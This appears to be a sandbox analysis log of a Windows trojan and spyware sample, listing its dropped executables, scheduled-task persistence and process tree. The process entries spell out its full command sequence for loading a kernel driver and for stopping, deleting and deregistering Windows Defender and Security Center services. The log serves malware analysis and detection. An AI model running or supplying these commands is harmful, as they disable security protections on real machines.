Source: random[1].exe.2.dr Static PE information: section name: .idata
Source: random[1].exe.2.dr Static PE information: section name:
Source: 3d9778a1ff.exe.2.dr Static PE information: section name:
Source: 3d9778a1ff.exe.2.dr Static PE information: section name: .idata
Source: 3d9778a1ff.exe.2.dr Static PE information: section name:
Source: rapes.exe.4.dr Static PE information: section name:
Source: rapes.exe.4.dr Static PE information: section name: .idata
Source: rapes.exe.4.dr Static PE information: section name:
Source: Or1ARiR[1].exe.11.dr Static PE information: section name:
Source: Or1ARiR[1].exe.11.dr Static PE information: section name: .rsrc
Source: Or1ARiR[1].exe.11.dr Static PE information: section name: .idata
Source: Or1ARiR[1].exe.11.dr Static PE information: section name:
Source: Or1ARiR.exe.11.dr Static PE information: section name:
Source: Or1ARiR.exe.11.dr Static PE information: section name: .rsrc
Source: Or1ARiR.exe.11.dr Static PE information: section name: .idata
Source: Or1ARiR.exe.11.dr Static PE information: section name:
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 2_2_0069CAC7 NtFlushProcessWriteBuffers,NtFlushProcessWriteBuffers, 2_2_0069CAC7
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe File created: C:\Users\user\AppData\Local\Temp\ssisd.sys
Source: C:\Users\user\Desktop\SUAosT64HD.exe File created: C:\Windows\Tasks\axplong.job
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe File created: C:\Windows\Tasks\rapes.job
Source: C:\Windows\System32\cmd.exe File deleted: C:\Windows\System32\Tasks\Microsoft\Windows\Windows Defender
Source: C:\Users\user\Desktop\SUAosT64HD.exe Code function: 1_2_004A5B93 1_2_004A5B93
Source: C:\Users\user\Desktop\SUAosT64HD.exe Code function: 1_2_004A4AF0 1_2_004A4AF0
Source: C:\Users\user\Desktop\SUAosT64HD.exe Code function: 1_2_004A4CF0 1_2_004A4CF0
Source: C:\Users\user\Desktop\SUAosT64HD.exe Code function: 1_2_004E8720 1_2_004E8720
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 2_2_0068E440 2_2_0068E440
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 2_2_006A60C2 2_2_006A60C2
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 2_2_006C8720 2_2_006C8720
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 2_2_00684AF0 2_2_00684AF0
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 2_2_006C2BD0 2_2_006C2BD0
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 2_2_00684CF0 2_2_00684CF0
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 2_2_006A0D43 2_2_006A0D43
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 2_2_006C6F09 2_2_006C6F09
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 2_2_006C3068 2_2_006C3068
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 2_2_006A1532 2_2_006A1532
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 2_2_006C765B 2_2_006C765B
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 2_2_006C777B 2_2_006C777B
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 2_2_006A3D21 2_2_006A3D21
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 2_2_006B7D83 2_2_006B7D83
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 3_2_006C3068 3_2_006C3068
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 3_2_00684AF0 3_2_00684AF0
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 3_2_006C2BD0 3_2_006C2BD0
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 3_2_00684CF0 3_2_00684CF0
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 3_2_006B7D83 3_2_006B7D83
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 3_2_006C765B 3_2_006C765B
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 3_2_006C777B 3_2_006C777B
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 3_2_006C8720 3_2_006C8720
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 3_2_006C6F09 3_2_006C6F09
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 10_2_006C3068 10_2_006C3068
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 10_2_00684AF0 10_2_00684AF0
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 10_2_006C2BD0 10_2_006C2BD0
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 10_2_00684CF0 10_2_00684CF0
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 10_2_006B7D83 10_2_006B7D83
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 10_2_006C765B 10_2_006C765B
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 10_2_006C777B 10_2_006C777B
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 10_2_006C8720 10_2_006C8720
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 10_2_006C6F09 10_2_006C6F09
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe 36AE4D38A565D2D9D1AAE3F72419FE6330FB2030017364B730393A0E4ED247D0
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\apple[1].exe 1DC8BF01C0DF1FF9C85546E5304169E7F4B79712A63FBCB13CD577808D80B3FB
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: String function: 00697F30 appears 387 times
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: String function: 0069D593 appears 38 times
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: String function: 0069D872 appears 86 times
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: String function: 00697870 appears 42 times
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: String function: 0069DEB0 appears 82 times
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: String function: 0069D57E appears 78 times
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: String function: 006B8CD3 appears 47 times
Source: C:\Users\user\Desktop\SUAosT64HD.exe Code function: String function: 004B7F30 appears 128 times
Source: SUAosT64HD.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f
Source: SUAosT64HD.exe Static PE information: Section: ZLIB complexity 0.9973709979564033
Source: axplong.exe.1.dr Static PE information: Section: ZLIB complexity 0.9973709979564033
Source: random[1].exe.2.dr Static PE information: Section: ZLIB complexity 0.9983912276170799
Source: random[1].exe.2.dr Static PE information: Section: ldnixbmt ZLIB complexity 0.9947359228886616
Source: 3d9778a1ff.exe.2.dr Static PE information: Section: ZLIB complexity 0.9983912276170799
Source: 3d9778a1ff.exe.2.dr Static PE information: Section: ldnixbmt ZLIB complexity 0.9947359228886616
Source: rapes.exe.4.dr Static PE information: Section: ZLIB complexity 0.9983912276170799
Source: rapes.exe.4.dr Static PE information: Section: ldnixbmt ZLIB complexity 0.9947359228886616
Source: Or1ARiR[1].exe.11.dr Static PE information: Section: ZLIB complexity 0.9980737036401099
Source: Or1ARiR[1].exe.11.dr Static PE information: Section: iphnbyse ZLIB complexity 0.9946029135338346
Source: Or1ARiR.exe.11.dr Static PE information: Section: ZLIB complexity 0.9980737036401099
Source: Or1ARiR.exe.11.dr Static PE information: Section: iphnbyse ZLIB complexity 0.9946029135338346
Source: xZRvIQ5[1].exe.11.dr Static PE information: Section: .cSs ZLIB complexity 1.0003236607142858
Source: xZRvIQ5.exe.11.dr Static PE information: Section: .cSs ZLIB complexity 1.0003236607142858
Source: axplong.exe.1.dr Static PE information: Entrypoint disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: SUAosT64HD.exe Static PE information: Entrypoint disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@118/47@0/3
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Mutant created: \Sessions\1\BaseNamedObjects\a091ec0a6e22276a96a99c1d34ef679c
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4860:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:3328:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3940:120:WilError_03
Source: C:\Users\user\Desktop\SUAosT64HD.exe File created: C:\Users\user\AppData\Local\Temp\44111dbc49
Source: C:\Users\user\AppData\Local\Temp\22.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\5B75.tmp\5B86.tmp\5B87.bat C:\Users\user\AppData\Local\Temp\22.exe"
Source: C:\Users\user\Desktop\SUAosT64HD.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\SUAosT64HD.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: SUAosT64HD.exe ReversingLabs: Detection: 73%
Source: SUAosT64HD.exe Virustotal: Detection: 77%
Source: 3d9778a1ff.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: 3d9778a1ff.exe String found in binary or memory: " /add
Source: 3d9778a1ff.exe String found in binary or memory: " /add /y
Source: rapes.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: rapes.exe String found in binary or memory: " /add
Source: rapes.exe String found in binary or memory: " /add /y
Source: rapes.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: rapes.exe String found in binary or memory: " /add
Source: rapes.exe String found in binary or memory: " /add /y
Source: C:\Users\user\Desktop\SUAosT64HD.exe File read: C:\Users\user\Desktop\SUAosT64HD.exe
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc
Source: unknown Process created: C:\Users\user\Desktop\SUAosT64HD.exe "C:\Users\user\Desktop\SUAosT64HD.exe"
Source: C:\Users\user\Desktop\SUAosT64HD.exe Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe "C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe"
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe Process created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe "C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe
Source: C:\Windows\System32\svchost.exe Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Process created: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe "C:\Users\user\AppData\Local\Temp\10357800101\apple.exe"
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe Process created: C:\Users\user\AppData\Local\Temp\22.exe "C:\Users\user\AppData\Local\Temp\22.exe"
Source: C:\Users\user\AppData\Local\Temp\22.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\5B75.tmp\5B86.tmp\5B87.bat C:\Users\user\AppData\Local\Temp\22.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\22.exe "C:\Users\user\AppData\Local\Temp\22.exe" go
Source: C:\Users\user\AppData\Local\Temp\22.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\5CCD.tmp\5CCE.tmp\5CCF.bat C:\Users\user\AppData\Local\Temp\22.exe go"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc create ddrver type= kernel binPath= "C:\Users\user\AppData\Local\Temp\ssisd.sys"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start ddrver
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\timeout.exe timeout /t 1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc stop ddrver
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start ddrver
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\takeown.exe takeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\icacls.exe icacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Process created: C:\Users\user\AppData\Local\Temp\10358260101\Rm3cVPI.exe "C:\Users\user\AppData\Local\Temp\10358260101\Rm3cVPI.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc stop "WinDefend"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc delete "WinDefend"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc stop "MDCoreSvc"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc delete "MDCoreSvc"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc stop "WdNisSvc"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc delete "WdNisSvc"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc stop "Sense"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc delete "Sense"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg delete "HKLM\System\CurrentControlset\Services\Sense" /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc stop "wscsvc"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc delete "wscsvc"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\svchost.exe Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
Source: C:\Users\user\Desktop\SUAosT64HD.exe Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe "C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe"
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe Process created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe "C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe"
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Process created: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe "C:\Users\user\AppData\Local\Temp\10357800101\apple.exe"
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Process created: C:\Users\user\AppData\Local\Temp\10358260101\Rm3cVPI.exe "C:\Users\user\AppData\Local\Temp\10358260101\Rm3cVPI.exe"
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Process created: C:\Windows\System32\reg.exe reg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe Process created: C:\Users\user\AppData\Local\Temp\22.exe "C:\Users\user\AppData\Local\Temp\22.exe"
Source: C:\Users\user\AppData\Local\Temp\22.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\5B75.tmp\5B86.tmp\5B87.bat C:\Users\user\AppData\Local\Temp\22.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\22.exe "C:\Users\user\AppData\Local\Temp\22.exe" go
Source: C:\Users\user\AppData\Local\Temp\22.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\5CCD.tmp\5CCE.tmp\5CCF.bat C:\Users\user\AppData\Local\Temp\22.exe go"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc create ddrver type= kernel binPath= "C:\Users\user\AppData\Local\Temp\ssisd.sys"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start ddrver
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\timeout.exe timeout /t 1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc stop ddrver
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start ddrver
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\takeown.exe takeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\icacls.exe icacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc stop "WinDefend"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc delete "WinDefend"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc stop "MDCoreSvc"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc delete "MDCoreSvc"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc stop "WdNisSvc"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc delete "WdNisSvc"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc stop "Sense"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc delete "Sense"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg delete "HKLM\System\CurrentControlset\Services\Sense" /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc stop "wscsvc"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc delete "wscsvc"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown (38 identical entries)
Source: C:\Users\user\Desktop\SUAosT64HD.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\SUAosT64HD.exe Section loaded: winmm.dll
Source: C:\Users\user\Desktop\SUAosT64HD.exe Section loaded: wininet.dll
Source: C:\Users\user\Desktop\SUAosT64HD.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\SUAosT64HD.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\SUAosT64HD.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\SUAosT64HD.exe Section loaded: mstask.dll
Source: C:\Users\user\Desktop\SUAosT64HD.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\SUAosT64HD.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\SUAosT64HD.exe Section loaded: mpr.dll
Source: C:\Users\user\Desktop\SUAosT64HD.exe Section loaded: dui70.dll
Source: C:\Users\user\Desktop\SUAosT64HD.exe Section loaded: duser.dll
Source: C:\Users\user\Desktop\SUAosT64HD.exe Section loaded: chartv.dll
Source: C:\Users\user\Desktop\SUAosT64HD.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\SUAosT64HD.exe Section loaded: oleacc.dll
Source: C:\Users\user\Desktop\SUAosT64HD.exe Section loaded: atlthunk.dll
Source: C:\Users\user\Desktop\SUAosT64HD.exe Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\SUAosT64HD.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\SUAosT64HD.exe Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\SUAosT64HD.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\SUAosT64HD.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\SUAosT64HD.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\SUAosT64HD.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\SUAosT64HD.exe Section loaded: wtsapi32.dll
Source: C:\Users\user\Desktop\SUAosT64HD.exe Section loaded: winsta.dll
Source: C:\Users\user\Desktop\SUAosT64HD.exe Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\SUAosT64HD.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\SUAosT64HD.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\SUAosT64HD.exe Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\user\Desktop\SUAosT64HD.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\SUAosT64HD.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\SUAosT64HD.exe Section loaded: explorerframe.dll
Source: C:\Users\user\Desktop\SUAosT64HD.exe Section loaded: edputil.dll
Source: C:\Users\user\Desktop\SUAosT64HD.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\SUAosT64HD.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\SUAosT64HD.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\SUAosT64HD.exe Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\SUAosT64HD.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\SUAosT64HD.exe Section loaded: slc.dll
Source: C:\Users\user\Desktop\SUAosT64HD.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\SUAosT64HD.exe Section loaded: sppc.dll
Source: C:\Users\user\Desktop\SUAosT64HD.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe Section loaded: uxtheme.dll
